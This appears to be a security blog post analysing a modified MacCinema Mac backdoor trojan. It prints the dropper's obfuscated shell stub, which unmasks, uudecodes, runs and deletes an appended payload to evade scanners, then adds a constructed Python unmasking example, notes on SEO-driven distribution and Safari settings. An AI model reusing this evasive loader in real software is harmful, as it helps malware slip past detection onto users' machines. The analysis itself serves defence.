Last week I spotted a modified version of MacCinema. The change was not significant; the modification was made purely to evade scanner detection.
The script looks like this:
# decide a flag from the argument count, then take the last 53 lines of this
# file, i.e. the masked payload that follows the script
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 |
  # put the uuencode "begin" keyword back
  sed 's/lala/nigeb/' |
  # reverse every line (the classic sed equivalent of rev)
  sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' |
  # reverse the line order (BSD tail -r)
  tail -r |
  # decode, patch the placeholders, write to a file named after the CPU type
  uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' |
  sed 's/gnu/'$type'/' > `uname -p` &&
# run the decoded file, delete it, and exit before the shell reaches the data below
sh `uname -p` && rm `uname -p` && exit
# last line of the file: the disguised uuencode header, which the stages above turn into "begin 666 zigazaga"
agazagiz 666 lala
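To show what a scanner has to undo before it can see the uuencode block, here is an added Python example (not the post's code and not the malware's) that reverses the three sed/tail stages above and decodes the result; the function names and the sample payload are constructed for the demonstration.

```python
import binascii
# Added example, not code from the original post: undo the three stages the dropper
# applies to its appended payload (per-line reversal, reversed line order, "begin"
# -> "lala") so a scanner sees the real uuencode block. Names and sample are constructed.

def unmask_uuencoded(masked_lines):
    """Recover the uuencoded text exactly as the dropper's pipeline does."""
    out = []
    for line in masked_lines:
        # sed 's/lala/nigeb/' runs before the per-line reversal; uuencoded body
        # lines only use ' '..'`', so "lala" can only occur in the header.
        line = line.replace("lala", "nigeb", 1)
        out.append(line[::-1])          # the sed rev one-liner
    out.reverse()                       # tail -r
    return out

def uudecode_lines(lines):
    """Minimal uudecode of a begin/end block; returns (mode, name, data)."""
    header = lines[0].split()
    if len(header) != 3 or header[0] != "begin":
        raise ValueError("no uuencode header: %r" % lines[0])
    data = bytearray()
    for line in lines[1:]:
        if line == "end":
            break
        if line:
            data += binascii.a2b_uu(line)
    return header[1], header[2], bytes(data)

# Constructed fixture: a harmless text payload stored the way the script expects.
def uuencode_lines(name, data, mode="666"):
    lines = ["begin %s %s" % (mode, name)]
    for i in range(0, len(data), 45):
        lines.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n"))
    return lines + ["`", "end"]

def mask_like_dropper(uu_lines):
    masked = [line[::-1] for line in uu_lines]
    masked.reverse()                                    # header is now last
    masked[-1] = masked[-1].replace("nigeb", "lala")
    return masked

SAMPLE = b"harmless constructed payload text\n" * 3
MASKED = mask_like_dropper(uuencode_lines("zigazaga", SAMPLE))
def looks_uuencoded(lines):
    """The naive check a signature might use: false on disk, true after unmasking."""
    return any(l.startswith("begin ") for l in lines)
def recover(masked_lines=MASKED):
    return uudecode_lines(unmask_uuencoded(masked_lines))
```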
Anyway, this backdoor trojan is massively distributed around the internet. It relies on Google SEO, so most users stumble onto these malicious sites from Google search results.
Some sites lure Mac users with promises of free downloads of full-version software, cracks, serials, activators, generators, keys and fixes, just like the screenshot below.
…while others link to Mac videos, like the PornTube example below.
Some malware-serving sites are a bit more aggressive: rather than asking the user to download the DMG file, they download it automatically and Safari mounts it, because that behaviour is turned on by default. You can disable the automount by following these steps:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences
These steps have been discussed here previously.